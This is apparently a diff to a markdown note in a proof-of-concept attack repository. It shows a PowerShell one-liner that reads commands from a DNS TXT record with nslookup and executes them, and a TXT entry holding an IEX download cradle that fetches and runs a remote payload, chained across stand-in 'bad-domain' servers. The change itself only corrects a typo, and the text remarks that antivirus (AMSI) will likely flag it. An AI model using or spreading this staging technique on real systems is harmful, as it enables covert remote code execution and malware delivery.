Dood3/PoCs/nshookup/variants/del_var.md

 `powershell (nslookup -q=txt bad-domain2.com)[5]`<br><br>
 DNS Server TXT entry on bad-domain_2.com:<br>
 `IEX (New-Object Net.WebClient).DownloadString('http:/server/payload.html')`<br><br>
 *EXPLANATION: The commands can be chained together with a combination of dns servers.
-The client requests the first domain, which in return requests the actual commands.on the second server.*<br>
+The client requests the first domain, which in return requests the actual commands on the second server.*<br>
 This will most likely trigger AV (AMSI).<br>

 1. `powershell (nslookup -q=txt bad-domain.com)[5]`<br>